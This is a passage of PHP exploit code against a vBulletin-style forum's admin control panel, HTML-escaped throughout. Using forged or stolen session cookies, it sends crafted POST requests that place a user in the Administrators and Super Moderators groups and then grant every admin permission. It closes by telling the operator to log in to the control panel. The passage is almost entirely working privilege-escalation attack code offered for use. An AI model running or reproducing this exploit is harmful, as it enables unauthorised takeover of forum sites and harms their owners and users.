$data.=\"&user%5Bposts%5D=0\"; $data.=\"&userfield%5Bfield1%5D=\"; $data.=\"&userfield%5Bfield2%5D=\"; $data.=\"&userfield%5Bfield3%5D=\"; $data.=\"&userfield%5Bfield4%5D=\"; $data.=\"&user%5Busergroupid%5D=6\";//primary&nbsp;usergroup,&nbsp;6=Administrators $data.=\"&user%5Bdisplaygroupid%5D=-1\"; $data.=\"&user%5Bmembergroupids%5D%5B%5D=5\";//secondary&nbsp;usergroup,&nbsp;5=Super&nbsp;Moderators $data.=\"&options%5Bshowreputation%5D=1\"; $data.=\"&user%5Breputation%5D=10\"; $data.=\"&user%5Bwarnings%5D=0\"; $data.=\"&user%5Binfractions%5D=0\"; $data.=\"&user%5Bipoints%5D=0\"; $data.=\"&options%5Badminemail%5D=1\"; $data.=\"&options%5Bshowemail%5D=0\"; $data.=\"&options%5Binvisible%5D=0\"; $data.=\"&options%5Bshowvcard%5D=0\"; $data.=\"&options%5Breceivepm%5D=1\"; $data.=\"&options%5Breceivepmbuddies%5D=0\"; $data.=\"&options%5Bemailonpm%5D=0\"; $data.=\"&user%5Bpmpopup%5D=0\"; $data.=\"&options%5Bshowsignatures%5D=1\"; $data.=\"&options%5Bshowavatars%5D=1\"; $data.=\"&options%5Bshowimages%5D=1\"; $data.=\"&user%5Bautosubscribe%5D=-1\"; $data.=\"&user%5Bthreadedmode%5D=0\"; $data.=\"&user%5Bshowvbcode%5D=1\"; $data.=\"&user%5Bstyleid%5D=0\"; $data.=\"&adminoptions%5Badminavatar%5D=0\"; $data.=\"&adminoptions%5Badminprofilepic%5D=0\"; $data.=\"&user%5Btimezoneoffset%5D=0\"; $data.=\"&options%5Bdstauto%5D=1\"; $data.=\"&options%5Bdstonoff%5D=0\"; $data.=\"&user%5Bdaysprune%5D=-1\"; $data.=\"&user%5Bjoindate%5D%5Bmonth%5D=2\"; $data.=\"&user%5Bjoindate%5D%5Bday%5D=26\"; $data.=\"&user%5Bjoindate%5D%5Byear%5D=2007\"; $data.=\"&user%5Bjoindate%5D%5Bhour%5D=14\"; $data.=\"&user%5Bjoindate%5D%5Bminute%5D=39\"; $data.=\"&user%5Blastactivity%5D%5Bmonth%5D=2\"; $data.=\"&user%5Blastactivity%5D%5Bday%5D=26\"; $data.=\"&user%5Blastactivity%5D%5Byear%5D=2007\"; $data.=\"&user%5Blastactivity%5D%5Bhour%5D=14\"; $data.=\"&user%5Blastactivity%5D%5Bminute%5D=58\"; $data.=\"&user%5Blastpost%5D%5Bmonth%5D=0\"; $data.=\"&user%5Blastpost%5D%5Bday%5D=\"; $data.=\"&user%5Blastpost%5D%5Byear%5D=\"; $data.=\"&user%5Blastpost%5D%5Bhour%5D=\"; $data.=\"&user%5Blastpost%5D%5Bminute%5D=\"; $data.=\"&userid=\".$mu_uid; $data.=\"&ousergroupid=\"; $data.=\"&odisplaygroupid=0\"; $data.=\"&userfield%5Bfield1_set%5D=1\"; $data.=\"&userfield%5Bfield2_set%5D=1\"; $data.=\"&userfield%5Bfield3_set%5D=1\"; $data.=\"&userfield%5Bfield4_set%5D=1\"; $packet&nbsp;=\"POST&nbsp;\".$p.\"admincp/user.php?do=edit&u=$my_uid&nbsp;HTTP/1.0 \"; $packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; $packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php \"; $packet.=\"Accept-Language:&nbsp;en \"; $packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; $packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; $packet.=\"Host:&nbsp;\".$host.\" \"; $packet.=\"Content-Length:&nbsp;\".strlen($data).\" \"; $packet.=\"Pragma:&nbsp;no-cache \"; $packet.=\"Cookie:&nbsp;\".$cookie_prefix.\"lastactivity=0;&nbsp;\".$cookie_prefix.\"password=\".md5(trim($my_hash)).\";&nbsp;\".$cookie_prefix.\"userid=\".$uid.\";&nbsp;\".$cookie_prefix.\"sessionhash=\".trim($sess_hash).\";&nbsp;\".$cookie_prefix.\"cpsession=\".trim($cpsess_hash).\"; \"; $packet.=\"Connection:&nbsp;Close \"; $packet.=$data; sendpacketii($packet); sleep(1); //now&nbsp;give&nbsp;full&nbsp;rights&nbsp;to&nbsp;the&nbsp;new&nbsp;Administrator $data&nbsp;=\"do=update\"; $data.=\"&adminhash=\".$adminhash; $data.=\"&adminpermissions%5Bcanadminsettings%5D=1\"; $data.=\"&adminpermissions%5Bcanadminstyles%5D=1\"; $data.=\"&adminpermissions%5Bcanadminlanguages%5D=1\"; $data.=\"&adminpermissions%5Bcanadminforums%5D=1\"; $data.=\"&adminpermissions%5Bcanadminthreads%5D=1\"; $data.=\"&adminpermissions%5Bcanadmincalendars%5D=1\"; $data.=\"&adminpermissions%5Bcanadminusers%5D=1\"; $data.=\"&adminpermissions%5Bcanadminpermissions%5D=1\"; $data.=\"&adminpermissions%5Bcanadminfaq%5D=1\"; $data.=\"&adminpermissions%5Bcanadminimages%5D=1\"; $data.=\"&adminpermissions%5Bcanadminbbcodes%5D=1\"; $data.=\"&adminpermissions%5Bcanadmincron%5D=1\"; $data.=\"&adminpermissions%5Bcanadminmaintain%5D=1\"; $data.=\"&adminpermissions%5Bcanadminplugins%5D=1\"; $data.=\"&cssprefs=\"; $data.=\"&dismissednews=\"; $data.=\"&userid=\".$my_uid; $data.=\"&oldpermissions=98300\"; $data.=\"&adminpermissions%5Bcanadminupgrade%5D=0\"; $packet&nbsp;=\"POST&nbsp;\".$p.\"admincp/adminpermissions.php?do=update&nbsp;HTTP/1.0 \"; $packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; $packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php \"; $packet.=\"Accept-Language:&nbsp;en \"; $packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; $packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; $packet.=\"Host:&nbsp;\".$host.\" \"; $packet.=\"Content-Length:&nbsp;\".strlen($data).\" \"; $packet.=\"Pragma:&nbsp;no-cache \"; $packet.=\"Cookie:&nbsp;\".$cookie_prefix.\"lastactivity=0;&nbsp;\".$cookie_prefix.\"password=\".md5(trim($my_hash)).\";&nbsp;\".$cookie_prefix.\"userid=\".$uid.\";&nbsp;\".$cookie_prefix.\"sessionhash=\".trim($sess_hash).\";&nbsp;\".$cookie_prefix.\"cpsession=\".trim($cpsess_hash).\"; \"; $packet.=\"Connection:&nbsp;Close \"; $packet.=$data; sendpacketii($packet); echo&nbsp;\" now&nbsp;go&nbsp;to&nbsp;http://\".$host.$path.\"admincp/index.php&nbsp;and&nbsp;login&nbsp;to&nbsp;the&nbsp;control&nbsp;panel...\"; ?> &nbsp;